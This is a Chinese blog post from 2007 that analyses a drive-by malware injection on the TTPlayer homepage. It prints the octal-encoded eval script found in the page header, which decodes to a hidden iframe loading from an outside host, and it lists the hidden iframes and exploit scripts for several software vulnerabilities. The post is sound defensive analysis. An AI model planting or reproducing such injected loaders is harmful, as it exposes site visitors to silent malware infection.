注册 | 登录 忘记密码? 51cto首页 | 博客 | 论坛 | 招聘
热点文章 利用SMS OSD实现win2008操..
 帮助

千千静听主页被挂马_简单分析``


2007-12-22 20:36:21
版权声明:原创作品,允许转载,转载时请务必以超链接形式标明文章 原始出处 、作者信息和本声明。否则将追究法律责任。http://gudugengkekao.blog.51cto.com/172212/56171
现在貌似已经正常了~~
 
 
可能会连接下面一个:
 
 
 
用HttpDebuger看了下,是网通站被挂了~电信滴正常。。
 
简单分析下:
 
头部挂了一个:
 
<SCRIPT>eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\134\57\134\57\141\141\56\154\154\163\147\151\156\147\56\143\157\155\134\57\167\167\134\57\156\145\167\62\70\60\56\150\164\155\77\60\61\66\40\167\151\144\164\150\75\61\40\150\145\151\147\150\164\75\61\76\74\134\57\151\146\162\141\155\145\76\42\51");</script><html>
 
解密得:hXXp://aa.llsging.com/ww/new280.htm?016
 
挂了2个子框架~:
 
<iframe src=hXXp://a5.llsging.com/aa/nini.htm width=6 height=6></iframe>
 
<iframe src=hXXp://a5.llsging.com/aa/gege.htm width=6 height=6></iframe>
 
第一个:hXXp://a5.llsging.com/aa/nini.htm
 
16进制加密,解后有5个JS:
 
1、hxxp://a5.llsging.com/aa/11.js (MS06-014)
 
加密方式是unescape+16进制。
 
 
2、hxxp://a5.llsging.com/aa/bb.js(暴风影音漏洞)
 
加密方式是2次unescape
 
源代码解不出来,只解出了地址:
 
 
3、hxxp://a5.llsging.com/aa/ppp.js(PPStream漏洞
 
eval(function(p,a,c,k,e,d)加密
 
解后是8进制加密,再有一个unescape,最后得:
 
 
4、这个比较直接,MS06-014
 
 
5、hxxp://a5.llsging.com/aa/bf.html(联众游戏组件漏洞)
 
2次unescape,最后得:
 
 
好了~这个hXXp://a5.llsging.com/aa/nini.htm就这么多,看看另外一个````
 
第二个:hxxp://a5.llsging.com/aa/gege.htm
 
这个是RealPlayer漏洞~eval(function(p,a,c,k,e,d)+8进制加密
 
全部都解出来了~就这个RealPlayer漏洞的下载地址解不出来~
 
呵呵,没有安装呢....无法激活漏洞
 
另外我保存了一些解密的过程,有兴趣的去看看~:
 
www.kingzoo.com/tools/孤独更可靠/Temporary file.rar
 
解得头都大了~~很乱。。没有整理~
 
随便一提,那些漏洞下载的地址不一样,但都是同一个病毒,是机器狗~
 
我就没看了,前几天才遇到:
 
 

本文出自 “孤独更可靠” 博客,请务必保留此出处http://gudugengkekao.blog.51cto.com/172212/56171





    文章评论
 
2007-12-23 20:32:12
千千静听主页都被攻击啦

 

发表评论

昵   称:
验证码:  点击图片可刷新验证码  博客过2级,无需填写验证码
内   容: